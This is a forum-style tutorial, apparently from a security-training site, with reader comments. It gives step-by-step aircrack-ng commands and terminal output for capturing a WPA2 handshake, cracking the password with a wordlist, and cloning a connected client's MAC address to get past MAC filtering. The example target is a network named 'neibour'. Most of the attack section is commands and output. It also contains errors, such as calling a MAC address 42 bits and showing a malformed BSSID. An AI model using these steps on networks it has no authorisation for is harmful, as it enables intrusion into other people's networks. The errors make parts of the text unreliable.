Hacking a WiFi Network with MAC Filtering Enabled

September 21, 2015 | Views: 62925

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Don’t try this on networks on which you lack permission for penetration testing.

 

Intro:

MAC:

“MAC is a 42 bit address used to uniquely identify a device. “

“MAC filtering is a way in which the network administrator allows only specific mac address to connect to the router.” 

 

Let’s divide this topic in two threads:

[-] Crack WiFi network.

[-] Get in to it even if MAC filtering is enabled.

 

Tools:

1-Kali Linux

Rather then downloading this separately and spending your time configuring the tools, download “Kali Linux” because it’s the mother of all possible tools available out there.

2-Wireless card capable of monitoring

 

If you have both, then let’s start:

Crack a WiFi network:

First disconnect all wireless connections.

Open your terminal:

Command: airmon-ng start [your WLAN card]

If you don’t know the name of your WLAN card, open terminal type ifconfig and check the name there. All network adapters will be showing there.

It is usually “wlan0.” So, let’s use wlan0 as network card name.

Type: airmon-ng start wlan0

Hit Enter.

It will print some thing like this:

Found 6 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

  PID Name
  661 NetworkManager
  763 wpa_supplicant
 1032 avahi-daemon
 1036 avahi-daemon
10136 dhclient
10295 dhclient

PHY	Interface	Driver		Chipset

phy0	wlan0		iwlwifi		Intel Corporation Centrino Advanced-N 6200 (rev 35)
		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
		(mac80211 station mode vif disabled for [phy0]wlan0)

Now, your network card is in monitor state.

You can see the monitor is enabled on “wlan0mon”

Command: airodump-ng [monitor interface]

As our monitor interface is "wlan0mon"

Type : airodump-ng wlan0mon

If it gives eror like:

ioctl(SIOCSIWMODE) failed: Device or resource busy

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.  Make
sure RFMON is enabled: run 'airmon-ng start wlan0mon <#>'
Sysfs injection support was not found either.

Then use these there commands to correct this and run above command again.
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

Now you can see all wifi networks in your range wait for your desired wifi network to be shown after that hit ctrl+c dont close or clear the terminal you need some info from there.

It will be like this:
 CH  7 ][ Elapsed: 24 s ][ 2015-09-20 04:02                                         
                                                                                                                                                     
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                     
 1C:sB:25:4F:93:F3  -44       27        0    0  11  54   WPA2 CCMP   PSK  neibour                                                                  
 30:B9:21:FB:5E:DB  -64       19        0    0   1  54e  WPA  CCMP   PSK  Hoes                                                                    
 58:3A:35:6A:60:31  -83       27        0    0   8  54e  WPA2 CCMP   PSK  club                                                                      
 3A:6C:F5:4E:68:AB  -87        9        0    0   1  54e. WPA2 CCMP   PSK  public                                                           
                                                                                              

The next command is: airodump-ng –bssid [mac of router] -c [channel ] –write [Out put file name] [monitor interface]

Get the MAC channel info of your target network from airodump-ng wlan0mon command’s output.


Lets penetrate 
neibour:

airodump-ng –bssid 1C:sB:25:4F:93:F3 -c 11 –write WPAcrack wlan0mon

Hit Enter.

It will look like:

 CH 11 ][ Elapsed: 1 min ][ 2015-09-20 04:10                                   
                                                                               
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH E
                                                                               
 1C:sB:25:4F:93:F3  -44 100      716       95    0  11  54   WPA2 CCMP   PSK  B
                                                                               
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe     
                                                                               
 1C:sB:25:4F:93:F3  18:87:96:11:9B:A8  -30    1 -54      0        6             
 1C:sB:25:4F:93:F3  70:0B:C0:5F:68:56  -67   18 - 1      0       48             
 1C:sB:25:4F:93:F3  34:23:BA:28:B5:0E  -68    1 -11      0        5             
 1C:sB:25:4F:93:F3  44:91:DB:A5:66:78  -81   11 - 1      0       30

 

Now, wait for the “hand shake” text to appear on the terminal.

Congrats! You know have password hashes and time to crack them. You’ll get passwords in plain text form – be sure to use your best word list, because this all depends on your word list .

Open another terminal and don’t close the previous one, as we need some info from it.

Command:aircrack-ng [captured password hash file name] -w [word list]

Type:aircrack-ng WPAcrack-01.cap -w wordlist.txt

 

Now, pray.

If your prayer and the wordlist worked, you got the password. Now, login to WiFi.

 

At this point, you might have this question:

Q)Holy crab whats that authentication problem??? What should I do now??

A)You have to be cool.

This means the MAC filtering is enabled.

 

Get in to it even the mac filtering is enabled.

 CH 11 ][ Elapsed: 1 min ][ 2015-09-20 04:10                                   
                                                                               
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH E
                                                                               
 2C:AB:25:4F:93:F3  -44 100      716       95    0  11  54   WPA2 CCMP   PSK  B

Navigate to the out put of “airodump-ng –bssid 10:AB:25:4F:93:F3 -c 11 –write WPAcrack wlan0mon” command you can see mac address under  “STATION” 

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe     
                                                                               
 1C:sB:25:4F:93:F3  18:87:96:11:9B:A8  -30    1 -54      0        6             
 1C:sB:25:4F:93:F3  70:0B:C0:5F:68:56  -67   18 - 1      0       48             
 1C:sB:25:4F:93:F3  34:23:BA:28:B5:0E  -68    1 -11      0        5             
 1C:sB:25:4F:93:F3  44:91:DB:A5:66:78  -81   11 - 1      0       30

Do you see ’em?

These are the MAC addresses of users connected to the network.

 

Now, you might be thinking:

Q)So, let’s cool it?? :/

A) If you are thinking this, then it’s time to use brain.py xD. These MAC addresses are allowed to connect to network. If you have this MAC address, the MAC filter will not block you.

Time to clone xD

Open terminal:

Command 1: ifconfig wlan0 down

Command 2: ifconfig wlan0 hw ether [desired mac adress]

Command 3: ifconfig wlan0 up

Choose one of the MAC address from under the station output. Let’s use 34:23:BA:28:B5:0E

And type:

Command 1: ifconfig wlan0 down

Command 2: ifconfig wlan0 hw ether 34:23:BA:28:B5:0E

Command 3: ifconfig wlan0 up

Type :ifconfig to conform that your MAC is changed

 

Now??

Now what man just connected already xD?

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
55 Comments
  1. Thumbs up!!

  2. will it work in Windows? or is there any software that has the same capability for windows 10? *just curious tho

  3. I love this guide and I am happy to have found it! This guide expresses penetration testing for MAC address filtering with a password, but I was wondering what the steps would be to enter a WiFi network that doesn’t have a password but only MAC address filtering? I’m sure it would be similar and not hard to do at all. I tried to set my laptop’s wireless device to a MAC address that is registered to the network but I would get blue screens unless I disabled it. Thanks for the awesome guide!

  4. airodump-ng –bssid 1C:sB:25:4F:93:F3 -c 11 –write WPAcrack wlan0mon where to use this command>> there is no space to write a command …it will be written in new terminal window?? but there it shows an error./././././/./i am using live kali amd64

Page 8 of 8« First...«45678
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel